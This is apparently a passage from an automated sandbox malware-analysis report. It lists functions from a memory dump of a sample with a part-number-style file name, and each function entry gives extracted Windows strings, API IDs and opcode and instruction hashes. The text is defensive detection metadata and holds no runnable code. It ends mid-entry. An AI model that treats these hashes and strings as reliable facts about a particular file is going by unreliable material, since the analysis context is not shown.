Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 8BC1CE3120434A9BEB24CF28C844B6BFBE5BFD4B19F184A2CF6969B290E774D505CB41

Function 0177E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0177E751
Legacy, xrefs: 0177E75A

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 06c0b81a96860dd83aed041c2ac057d12882884715bcdd54effa94ee8b266afa
Instruction ID: 31de751846eff3d44de97b38d44f553f9162a53eef0fe5130519982305047020
Opcode Fuzzy Hash: 06c0b81a96860dd83aed041c2ac057d12882884715bcdd54effa94ee8b266afa
Instruction Fuzzy Hash: E6612A71E407199FDB25DFA8C844BAEFBB9FB48704F1440ADE649EB291DB31A940CB50

Function 017A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 017A4437
MUI, xrefs: 017A4525

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 9abde963ae1670a8d85efa84472f8300b0433504f263874dc53db7f97875892c
Instruction ID: 3a4ae9d2295796f895f508c57bf9eef6482ec7ae98e974641c9ad91d79b5881e
Opcode Fuzzy Hash: 9abde963ae1670a8d85efa84472f8300b0433504f263874dc53db7f97875892c
Instruction Fuzzy Hash: D15138B1E0021DAFDB11DFA9CC84AEEFBB8EB44754F540629E611B7280D7719A45CB60

Function 017004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0170063D
kLsE, xrefs: 01700540

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 0600fdee785176629d0612dc75cdb14013ac514346981f2d91adc5672c05a126
Instruction ID: e3614d9ece0ad9981aa95c42dd53f3c173ed00d7aa9ae739dbf7a98d14c10d32
Opcode Fuzzy Hash: 0600fdee785176629d0612dc75cdb14013ac514346981f2d91adc5672c05a126
Instruction Fuzzy Hash: ED51BE71504742CFD726DF28C844BA7FBE5AF84360F20883EFA9A87281E7709545CB92

Function 0170A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0170A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0170A2FB

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 4cafa55950cf664699fb81513c1f47f5c3031dd53cf6fcc8cbd7a7d40a50e80a
Instruction ID: f6b871142cc421954b8c0261b67b743496f696a7d75dd786cf3f38b8f68f646f
Opcode Fuzzy Hash: 4cafa55950cf664699fb81513c1f47f5c3031dd53cf6fcc8cbd7a7d40a50e80a
Instruction Fuzzy Hash: 7841AC30A04745DBDB16CF59C844BAAFBF8FF95700F2480A5E904DB2A6E6B5D940CB50

Function 0173A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0173A5E9
Cleanup Group, xrefs: 0173A5E4

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: f1cb17946a192ab7f549557e47ee1e7b8d0d4cfe8b9d7ecc4ebc8f873c1cb6a6
Instruction ID: 03e6caa0b9c1c6f380c2494387971319d81b1f4f1b5f9c5c825f8bfffb7e87df
Opcode Fuzzy Hash: f1cb17946a192ab7f549557e47ee1e7b8d0d4cfe8b9d7ecc4ebc8f873c1cb6a6
Instruction Fuzzy Hash: 7E01DCB2644740EFD321DF24CD4AB26B7F8E784B26F018939B689CB595E334E804DB46

Function 0170C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0170C8C3, 0170CA40

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 5f26933904d6b59a9137a01e2f5a4ab34202a5bf0fd72172f6532ea0b0cc3c0e
Instruction ID: 357300c6cce7afb9c784b912e8ffe173b666eecf0205a9f60222a2903f527832
Opcode Fuzzy Hash: 5f26933904d6b59a9137a01e2f5a4ab34202a5bf0fd72172f6532ea0b0cc3c0e
Instruction Fuzzy Hash: AD823C75E00319DBEB26CFA9C8847EDFBF5BF48310F1481A9E919AB295D7309981CB50

Function 01786420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 017865C1

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2aa90f08ee112f414010cc6a6e91f583abb6af02401f20c8b1919fae26c28830
Instruction ID: b2a36f1680e474cb6d85d0759a6238ec090a15224fba36d31260b7ff19784ada
Opcode Fuzzy Hash: 2aa90f08ee112f414010cc6a6e91f583abb6af02401f20c8b1919fae26c28830
Instruction Fuzzy Hash: 5C914171A40219BFEB21EF99CD85FAEFBB8EF18B50F104055F600AB195D775A904CBA0

Function 017AE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 017AE1FA

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9fb8347cd16940d13a4cde7449abbf0d025d434af626bc84b0efe95f1a4878b0
Instruction ID: 436b73ebc9bc6e23507afb1cd3c15267784035328e0d34d30d8aab878e14a42e
Opcode Fuzzy Hash: 9fb8347cd16940d13a4cde7449abbf0d025d434af626bc84b0efe95f1a4878b0
Instruction Fuzzy Hash: FB91AD32900609BFDB22AFA9DC48FAFFBB9EF85750F500129F501A7254EB359905CB91

Function 0173A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 017767C9

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: a3c6a454dbc8662e73412d314a7d86625475f614b4d6e18eb362117691acc3e5
Instruction ID: 88c4ddffea4d6157874645c623ae41bd021f4b1f422bb9656c31553ce39e29d8
Opcode Fuzzy Hash: a3c6a454dbc8662e73412d314a7d86625475f614b4d6e18eb362117691acc3e5
Instruction Fuzzy Hash: 8B716DB5E0061ACFEF28CF9DC590AADFBB1BF88750F14816EE505A7249E7319841CB90

Function 017A4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 017A4A7F

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 00755e6553fb6f0403e5804d58a46e69ff3d229d51a29718c6cda87e234dff36
Instruction ID: adadf60e08d9e34a31081271bc7182a99fa4f5f6f83e2ed187a0253ea5cddf89
Opcode Fuzzy Hash: 00755e6553fb6f0403e5804d58a46e69ff3d229d51a29718c6cda87e234dff36
Instruction Fuzzy Hash: 9951C572D0022ADBDF11DF9DC844AAEFBB4BF84610F494269E912BB244D7B59D01CBE4

Function 0171E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0171E6A4

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: aa86b39777855211bafbbdd6eb579afb4f75ade774b6b8d8bb573cdc226ff3a7
Instruction ID: b12686ce4036f81cf50304bc932bd91e224494cd143558cd0825c4808603cb28
Opcode Fuzzy Hash: aa86b39777855211bafbbdd6eb579afb4f75ade774b6b8d8bb573cdc226ff3a7
Instruction Fuzzy Hash: B34193725083129BE712DB79C844B6BFBE8AF88714F44092DFA85E7188EB74D904C796

Function 0177C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0177C77F

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 0768dc585b8f19496c8cdbcd4c842efcbef61cbe29853d5cc3516d814f9a66e3
Instruction ID: c448ec2ca7a129b45ca8c8f7ea194b66acc34df30e171d8dd1f226e3e20176b9
Opcode Fuzzy Hash: 0768dc585b8f19496c8cdbcd4c842efcbef61cbe29853d5cc3516d814f9a66e3
Instruction Fuzzy Hash: 864142B1D4052EABDF21DA50DC84FDEF77CAB49724F0045A5AB08AB144DB709E898FA4

Function 01796B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01796B91

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7f36ca8a8f75e3c2490e90a80ec03199db61eebcd46880b097d4d398be8ac9de
Instruction ID: 73d367a04ac1e47cd2e965ccadb55e512b885502e95a398455d73daae25f39ff
Opcode Fuzzy Hash: 7f36ca8a8f75e3c2490e90a80ec03199db61eebcd46880b097d4d398be8ac9de
Instruction Fuzzy Hash: 94311631A007999BEF22DF69D854BAEFBA8DF06704F144168F941AB282D775F809CB50

Function 0177CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0177CAA2

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: b2c3e29a7ac6f39ac373cdb4f84dea1240ead5041674bdea7eb411b8419063f8
Instruction ID: 0291026dce13fbefff005131dbfca850d1c866a3117b16c8520739db5bac2195
Opcode Fuzzy Hash: b2c3e29a7ac6f39ac373cdb4f84dea1240ead5041674bdea7eb411b8419063f8
Instruction Fuzzy Hash: E7310336900516AFEF16DB58C845E7FFB74EB88720F114169B901AB260D7309E04EBE0

Function 0178892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0178895E

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 171caa5f60afc57610ef6b85baf29a8ad9118bbd02c26c90582b54d6060dbffd
Instruction ID: 9c5b679add9202dcc16ee14aea5ae02d5a0aef5e7e1c94afd6768d3987ae1630
Opcode Fuzzy Hash: 171caa5f60afc57610ef6b85baf29a8ad9118bbd02c26c90582b54d6060dbffd
Instruction Fuzzy Hash: 110126762883019BE7317B5ACC88B6BFFA9EF81364B44012CF7811A156CF20A840C797

Function 017A2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 459c99dbf5b7950bdc0dd0aad2683d8ff5f42e8423abc94defde5cb5186f0bcd
Instruction ID: 46ccd3a6ee58a4fd1a1d2089a0e8fbf7685ea14497d1e49b69c0bc4ad0398363
Opcode Fuzzy Hash: 459c99dbf5b7950bdc0dd0aad2683d8ff5f42e8423abc94defde5cb5186f0bcd
Instruction Fuzzy Hash: 7042D5316083419FE725CF68C890A6BFBE5BFC8700F980A2DFA8697252D771D945CB52

Function 01798158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56e0f5d7ffece4872d647d70f6114eb4aef8e1cf45d2bd0d9041658c602fe953
Instruction ID: 312e2863ae7a49aa063db482e33ab72074cb74e7ae543d5709734c07d07c3468
Opcode Fuzzy Hash: 56e0f5d7ffece4872d647d70f6114eb4aef8e1cf45d2bd0d9041658c602fe953
Instruction Fuzzy Hash: 44426B75A102198FEF24CF69C881BADFBF5BF49310F188099E949EB242D7349985CF61

Function 01712840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cc0c7be7bf5bb86407ec5cf142dc9b0280d372cd04e9e9be5ddd8fdd9b589c6
Instruction ID: 3a7a8cdfa83184117fc6d982633ba4f560aaf92cf66975b87e5eb3b4e60e602b
Opcode Fuzzy Hash: 1cc0c7be7bf5bb86407ec5cf142dc9b0280d372cd04e9e9be5ddd8fdd9b589c6
Instruction Fuzzy Hash: 2532CD70A007568FDB25CF69C8447BEFBFABF84704F64811DE8869B289D735A841CB50

Function 017AA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c88cb256e0fa29d12e100c0c5bce1085db11a3ed85906ed03e9ccab48f5f6116
Instruction ID: 44df16908df9eacc75991f6da011623c352927ea33991a627fa46acbd9e6aee6
Opcode Fuzzy Hash: c88cb256e0fa29d12e100c0c5bce1085db11a3ed85906ed03e9ccab48f5f6116
Instruction Fuzzy Hash: D422D2706046618FEB25CF2DC094772FBF1AFC4300F98869AE9968F286D735E452DB61

Function 01706A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa67e5ae93c5b4f9369f4a1b4ad6d3fb568bf2c1fdbd27826ee5643815de6d83
Instruction ID: 77f5aa7bc90a689a8d9ca18bd5f684b273145f65f7fdb308d74a3ab94787b8eb
Opcode Fuzzy Hash: aa67e5ae93c5b4f9369f4a1b4ad6d3fb568bf2c1fdbd27826ee5643815de6d83
Instruction Fuzzy Hash: 79329B71A04705CFDB26CF68C494AAAFBF5FF88310F2485A9E956AB391D730E851CB50

Function 01724A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 5e35bf3877ff473b70f4e0157077d9154b153bf34e258be29665172bd93a5b06
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 3AF15071E0022A9BDB15CFA9C594BAEFBF9BF48710F048169E906EB345E774D842CB50

Function 0179892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70103bcbe4dd0a593b75d3b1f350abf793d12d28d369cae98f7d11f5d3293f8d
Instruction ID: a02f32ea91d8a7d2c6133364d307a5abc5965ee194e292e51f13fd0d58f94c29
Opcode Fuzzy Hash: 70103bcbe4dd0a593b75d3b1f350abf793d12d28d369cae98f7d11f5d3293f8d
Instruction Fuzzy Hash: 24D10271A0060E8BDF05CF68D841ABEF7F1AF89314F18816AD955E7241E739EA09CB61

Function 017065D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7fc66bfa6b0c6f522860fd471b2f3204eb6d401216c85d34d7847feb4e7a602
Instruction ID: e284a6a2757177bc9d934688a980edb9ee37728b369eeee273a03540d405f610
Opcode Fuzzy Hash: e7fc66bfa6b0c6f522860fd471b2f3204eb6d401216c85d34d7847feb4e7a602
Instruction Fuzzy Hash: 44E18B71608342CFC716CF28C4A4A6AFBE0BF89314F15896DF99587391EB31E915CB92

Function 016F8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bdadebf4e677bf9223cc9f3bd736b149512c38a304354d6aa306fff85f471e3
Instruction ID: f1835bc9268affb6abaee793a03b942f1c4d5fa4ec3d751cc76af5e536da7982
Opcode Fuzzy Hash: 7bdadebf4e677bf9223cc9f3bd736b149512c38a304354d6aa306fff85f471e3
Instruction Fuzzy Hash: 18D1E471A00206DBDB14DF68CC90BBEB7AAFF54304F15466DEA16DB280EB74E951CB60

Function 01788243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 5b4d3ff1f754143469298a8e70e9b01318cc280123284851df776bb678204b07
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 66B1AF75A40609AFDF24EF98C944FABFBB9BF84304F90446DAA02D7795DA30E905CB11

Function 01710535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 953b1e3b82f84b77a207cc958b39b2a0533c61b835027ac7fe873d84e55bcbb3
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 6DB1E8316006469FDB25DB6CC854BBEFBFAAF44300F280599EA52DB289D730DD81DB50

Function 017083C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 991cb6fcbc25549a9509ec54726d4a82c56be42f33de62ea542843688ea80f88
Instruction ID: a1b10d43f0b0da53ab6e6dbeeeabec0d28c095fe3478d7302dc320edacc382f3
Opcode Fuzzy Hash: 991cb6fcbc25549a9509ec54726d4a82c56be42f33de62ea542843688ea80f88
Instruction Fuzzy Hash: 7BC16670608381CFE760CF18C494BAAF7E8BF88304F54496DE98987391D775E908CB92

Function 016FC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba55c0aa12b24384e36899155c3f66af3c37938b9b809c49c16375a0d1fc8a7
Instruction ID: 79448f5816294219697b69841b918cb784c6e396efe1e44da65b6157c2cda653
Opcode Fuzzy Hash: 0ba55c0aa12b24384e36899155c3f66af3c37938b9b809c49c16375a0d1fc8a7
Instruction Fuzzy Hash: FCB16370A002698BDB74DF58CC94BA9B7B2EF44700F0485EDD64AE7241EB70DD86CB24

Function 0172E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6619ec4451b16bfca7b0521fd5e350748082154803c41f0eb4b9f02a54d78f2
Instruction ID: 863c431918a10173fea06476720cdd5a5a6668c3fec9a9ece72df1565accfc36
Opcode Fuzzy Hash: f6619ec4451b16bfca7b0521fd5e350748082154803c41f0eb4b9f02a54d78f2
Instruction Fuzzy Hash: E5A13531E00625AFEB32DB68D858FAEFBB8FB01714F050165EE01AB285DB749D41CB91

Function 01740185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4e18927e14a5fe76b4c4a67d188ead4bd5aa25c2061710926e4945aa430b8f4
Instruction ID: e4aad7cec1895816675f879136637580fb6542a4a9d733707840129f437ab6e1
Opcode Fuzzy Hash: b4e18927e14a5fe76b4c4a67d188ead4bd5aa25c2061710926e4945aa430b8f4
Instruction Fuzzy Hash: DCA1BE70B016169BDB25DF69C994BAAF7B1FF44328F104129EB05DB282EB34E811CB90

Function 017D4500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c5b938d3bd68b14b382ff266fa6908dd26159dd385661379b8a71bba9e54f4a
Instruction ID: 2cfce50a58875c26c12542da79ee6daa0e329486426f89f546c805d041220019
Opcode Fuzzy Hash: 9c5b938d3bd68b14b382ff266fa6908dd26159dd385661379b8a71bba9e54f4a
Instruction Fuzzy Hash: EAA1C972A04206AFC722DF18C984B2AFBF9FF48754F150928F58A9BA55D330E900CB91

Function 017D2B57 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction ID: e3b1cb26fd8c096fad9c0a6de513ec7bf87c6c951d302c831bbe95e8873edc43
Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction Fuzzy Hash: C2B11971E0061ADFDF29CFA9C880AADFBB5FF48310F148169E915A7356D730A946CB90

Function 017860E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 483afce738c043530a58b650e338056b924329180e9b1885a54f73f95534633e
Instruction ID: 34fb5bc67ca829b6c11cf9d842d8f3aa4bd63934d1f28368715dc865de743e84
Opcode Fuzzy Hash: 483afce738c043530a58b650e338056b924329180e9b1885a54f73f95534633e
Instruction Fuzzy Hash: B391C071D40216BFDB15EFA8D884BAEFFB5AB48710F1541A9F610EB345D734E9009BA0

Function 0171E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

